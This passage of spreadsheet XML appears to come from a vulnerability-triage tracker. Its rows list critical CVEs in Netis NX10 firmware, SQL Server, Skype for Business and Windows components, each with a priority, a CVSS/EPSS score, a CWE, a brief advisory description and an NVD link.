        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61516</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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 s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
